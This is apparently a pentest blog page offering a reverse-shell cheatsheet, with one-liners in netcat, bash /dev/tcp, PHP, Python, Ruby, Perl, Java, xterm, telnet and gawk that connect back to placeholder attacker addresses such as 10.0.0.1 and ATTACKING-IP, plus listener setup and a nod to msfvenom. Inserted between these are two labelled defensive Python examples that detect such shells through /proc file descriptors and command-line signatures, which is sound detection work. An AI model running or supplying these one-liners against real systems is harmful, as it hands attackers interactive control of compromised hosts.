Hack With Reverse Shell Cheatsheet
What is a Reverse Shell?
To take control of a compromised or vulnerable system, an attacker first tries to obtain interactive shell access for arbitrary command execution, then uses that access to escalate privileges and take over the whole system. Modern systems sit behind firewalls that block unsolicited inbound connections, so an attacker usually cannot connect to the system directly. But if someone uploads a reverse shell to the system and executes it, the system itself connects out to the attacker; all the attacker has to do is listen for that connection.
How Reverse Shell Works
In general, a reverse shell works the opposite way round from a bind shell. When a machine owned by the attacker connects to a remote machine and requests a shell session, that is a bind shell. When the remote (target) host instead initiates an outgoing connection to a listening host and a shell session is established over that connection, that is a reverse shell.
The hacker's usual approach is to compromise the system and look for a way to upload a reverse shell, for example through an old software version with a serious vulnerability or a misconfigured service running on the host. Once the reverse shell is executed, commands can be run to penetrate the system further.
Reverse Shell Cheatsheet
First, the hacker needs to start a listener on their own system to wait for the incoming connection. To start a listener:
$ nc -lvnp 1234
Netcat Reverse Shell
$ nc -e /bin/sh 10.0.0.1 1234
$ /bin/sh | nc [Attacking_ip] 80
$ rm -f /tmp/p; mknod /tmp/p p && nc [Attacking_ip] 4444 0</tmp/p | /bin/bash 1>/tmp/p
If you have the wrong version of netcat installed (one without the -e option), you might still be able to get your reverse shell back like this:
$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 1234 > /tmp/f
Bash Reverse Shell
$ exec /bin/bash 0<&0 1>&0 2>&0
$ 0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80;sh <&196 >&196 2>&196
$ exec 5<>/dev/tcp/ATTACKING-IP/80
$ cat <&5 | while read line; do $line 2>&5 >&5; done
OR,
$ while read line 0<&5; do $line 2>&5 >&5; done
$ bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1
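The netcat and bash one-liners above leave one host-side trace in common: either the shell's own standard streams end up on a network socket (the /dev/tcp forms, and likewise the PHP, Python, Ruby and Perl forms that dup the socket onto fds 0-2), or a network tool such as nc is wired to a shell through a pipe or fifo. On Linux, /proc/<pid>/fd/N is a symlink whose target names the underlying object, so a scan of those links is a cheap way to spot both shapes. The following checker is an added example for this page, not code from the cheatsheet or its sources; the pids, inode numbers and process names in SAMPLE are constructed, and the live /proc scan is Linux-only.

```python
"""Spot shells whose standard streams sit on a socket, and network tools whose
standard streams sit on a pipe (added example; not from the cheatsheet)."""
import os
import re
from typing import Dict, Optional, Tuple

SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}
NET_TOOLS = {"nc", "ncat", "netcat", "telnet"}
SOCKET_RE = re.compile(r"^socket:\[\d+\]$")   # readlink target of a socket fd
PIPE_RE = re.compile(r"^pipe:\[\d+\]$")       # readlink target of a pipe/fifo fd


def classify(comm: str, fd_targets: Dict[int, str]) -> Optional[str]:
    """Return a reason string when the process looks like a reverse/bind shell.

    comm       -- process name as found in /proc/<pid>/comm (or a full path)
    fd_targets -- {fd: readlink target} for fds 0, 1 and 2
    """
    name = os.path.basename(comm)
    stdio = [fd_targets.get(fd, "") for fd in (0, 1, 2)]
    if name in SHELLS and any(SOCKET_RE.match(t) for t in stdio):
        # bash -i >& /dev/tcp/..., os.dup2(sock, 0..2), open(STDIN, ">&S") ...
        return "shell-stdio-on-socket"
    if name in NET_TOOLS and any(PIPE_RE.match(t) for t in stdio[:2]):
        # mkfifo/mknod variants: the socket belongs to nc, the shell hangs off a pipe
        return "nettool-stdio-on-pipe"
    return None


def read_proc(pid: int) -> Tuple[str, Dict[int, str]]:
    """Collect comm and stdio link targets for a live pid (Linux only)."""
    with open(f"/proc/{pid}/comm") as fh:
        comm = fh.read().strip()
    targets: Dict[int, str] = {}
    for fd in (0, 1, 2):
        try:
            targets[fd] = os.readlink(f"/proc/{pid}/fd/{fd}")
        except OSError:
            pass  # fd closed, or another user's process and we are not root
    return comm, targets


def snapshot_live() -> Dict[int, Tuple[str, Dict[int, str]]]:
    """Build a {pid: (comm, fd_targets)} snapshot from /proc; run as root to see everything."""
    snap = {}
    for entry in os.listdir("/proc"):
        if entry.isdigit():
            try:
                snap[int(entry)] = read_proc(int(entry))
            except OSError:
                continue  # process exited mid-scan
    return snap


def scan(snapshot: Dict[int, Tuple[str, Dict[int, str]]]) -> Dict[int, str]:
    """Apply classify() to every process in the snapshot; return {pid: reason}."""
    hits = {}
    for pid, (comm, targets) in snapshot.items():
        reason = classify(comm, targets)
        if reason:
            hits[pid] = reason
    return hits


# Constructed sample (hypothetical pids and inode numbers) shaped like /proc output.
SAMPLE = {
    4242: ("bash", {0: "socket:[31337]", 1: "socket:[31337]", 2: "socket:[31337]"}),
    4301: ("bash", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),   # normal login shell
    4400: ("sshd", {0: "/dev/null", 1: "/dev/null", 2: "socket:[777]"}),    # daemon, not a shell
    4510: ("nc",   {0: "pipe:[9001]", 1: "pipe:[9002]", 2: "/dev/pts/1"}),  # fifo-style variant
    4600: ("curl", {0: "/dev/pts/2", 1: "pipe:[9100]", 2: "/dev/pts/2"}),   # not a net tool we track
}

if __name__ == "__main__":
    for pid, reason in scan(SAMPLE).items():
        print(f"pid {pid}: {reason}")
```

The first rule is a strong indicator: an interactive shell normally has a pty or pipe on its standard streams, never a socket. The second rule is weaker, since `echo ... | nc host port` is a legitimate pattern, so treat "nettool-stdio-on-pipe" as something to correlate with the parent and sibling processes (is the other end of the pipe a shell?) rather than alert on by itself. Replace SAMPLE with snapshot_live() to run it against a real host.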
PHP Reverse Shell
$ php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
(This assumes the TCP socket is file descriptor 3. If it doesn't work, try 4, 5 or 6.)
Python Reverse Shell
$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
RUBY Reverse Shell
$ ruby -rsocket -e 'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
PERL Reverse Shell
$ perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
PERL Windows Reverse Shell
$ perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
$ perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
JAVA Reverse Shell
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])
p.waitFor()
XTERM Reverse Shell
One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.
$ xterm -display 10.0.0.1:1
To catch the incoming xterm, start an X server (:1, which listens on port 6001). One way to do this is with Xnest (to be run on your system):
$ Xnest :1
You'll need to authorize the target to connect to you (command also run on your host):
$ xhost +targetip
TELNET Reverse Shell
$ rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0</tmp/p | /bin/bash 1>/tmp/p
$ telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443
GAWK Reverse Shell
#!/usr/bin/gawk -f
BEGIN {
    Port = 8080
    Prompt = "bkd> "
    Service = "/inet/tcp/" Port "/0/0"
    while (1) {
        do {
            printf Prompt |& Service
            Service |& getline cmd
            if (cmd) {
                while ((cmd |& getline) > 0)
                    print $0 |& Service
                close(cmd)
            }
        } while (cmd != "exit")
        close(Service)
    }
}
Note: with a local port and a remote address of 0/0, "/inet/tcp/8080/0/0" opens a listening socket, so this script actually behaves as a bind shell on TCP port 8080 rather than connecting back to the attacker.
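Every entry in the cheatsheet above is a single command line, which makes process-creation logging (auditd EXECVE records, an EDR feed, or shell history) a natural place to look for them. The scanner below is an added example for this page, not code from the cheatsheet or its sources: it carries one regular expression per family of one-liner shown above, runs them over a list of constructed exec events (hypothetical pids and users), and keeps only the events that trigger at least one signature. Two benign command lines are included to show that a plain port check with nc and an unrelated grep do not fire.

```python
"""Flag process command lines matching the reverse-shell families catalogued on
this page (added example; not from the cheatsheet or its sources)."""
import re
from typing import Dict, List

# One signature per family of one-liner on the page, named after that family.
SIGNATURES = [
    ("bash-dev-tcp",       re.compile(r"/dev/tcp/\S+")),
    ("nc-exec",            re.compile(r"\b(nc|ncat|netcat)\b[^|;&]*\s-[a-zA-Z]*e\s")),
    ("fifo-pipe-shell",    re.compile(r"\b(mkfifo|mknod)\b.*\b(nc|ncat|netcat|telnet)\b")),
    ("telnet-pipe-shell",  re.compile(r"\btelnet\b.*\|\s*/bin/(ba)?sh\b.*\|\s*telnet\b")),
    ("php-fsockopen",      re.compile(r"fsockopen\(.*exec\(")),
    ("python-socket-dup2", re.compile(r"socket\.socket\(.*dup2\(")),
    ("ruby-tcpsocket",     re.compile(r"TCPSocket\.open\(.*exec\b")),
    ("perl-socket-exec",   re.compile(r"\bSocket\b.*\bexec\(|IO::Socket::INET.*system")),
    ("xterm-display",      re.compile(r"\bxterm\b.*-display\s+\S+")),
    ("gawk-inet",          re.compile(r"/inet/tcp/")),
]


def match_cmdline(cmdline: str) -> List[str]:
    """Return the names of every signature the command line triggers, in table order."""
    return [name for name, rx in SIGNATURES if rx.search(cmdline)]


def scan_events(events: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Annotate {pid, user, cmdline} events with 'signatures'; drop events with no hit."""
    findings = []
    for ev in events:
        hits = match_cmdline(str(ev["cmdline"]))
        if hits:
            findings.append({**ev, "signatures": hits})
    return findings


# Constructed sample events (hypothetical pids and users); cmdlines mirror the cheatsheet.
SAMPLE_EVENTS = [
    {"pid": 5101, "user": "www-data",
     "cmdline": "bash -i >& /dev/tcp/10.0.0.1/80 0>&1"},
    {"pid": 5102, "user": "www-data",
     "cmdline": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 1234 > /tmp/f"},
    {"pid": 5103, "user": "app",
     "cmdline": "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,"
                "socket.SOCK_STREAM);s.connect((\"10.0.0.1\",1234));os.dup2(s.fileno(),0)'"},
    {"pid": 5104, "user": "ops",
     "cmdline": "nc -zv db.internal 5432"},             # benign: port reachability check
    {"pid": 5105, "user": "ops",
     "cmdline": "grep -r reverse /var/log/syslog"},     # benign: unrelated
    {"pid": 5106, "user": "www-data",
     "cmdline": "nc -e /bin/sh 10.0.0.1 1234"},
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"pid {f['pid']} user {f['user']}: {', '.join(f['signatures'])}")
```

Signatures of this kind are easy to evade with quoting, base64 wrapping or a different language, so they are best paired with a behavioural check (a shell whose stdio is a socket) and with egress filtering, which denies the callback in the first place. The "nc-exec" pattern deliberately requires the -e flag to be followed by whitespace so that scan-style invocations such as `nc -zv host port` do not fire.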
Note: If you're on a Debian-based distribution such as Kali Linux or Parrot OS, some default webshells ship in the /usr/share/webshells directory. You can also generate reverse shells with msfvenom, so keep Metasploit in your arsenal.
XTERM: In computing, xterm is the standard terminal emulator for the X Window System. A user can have many different invocations of xterm running at once on the same display, each of which provides independent input/output for the process running in it (normally the process is a Unix shell).
(Wikipedia)
GAWK: gawk is the GNU implementation of the Awk programming language, first developed for the UNIX operating system in the 1970s. The Awk programming language specializes in dealing with data formatting in text files, particularly text data organized in columns. (Red Hat)
Reference:
https://highon.coffee/blog/reverse-shell-cheat-sheet/
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Those were some reverse shell examples. Happy Hacking!!!😊😊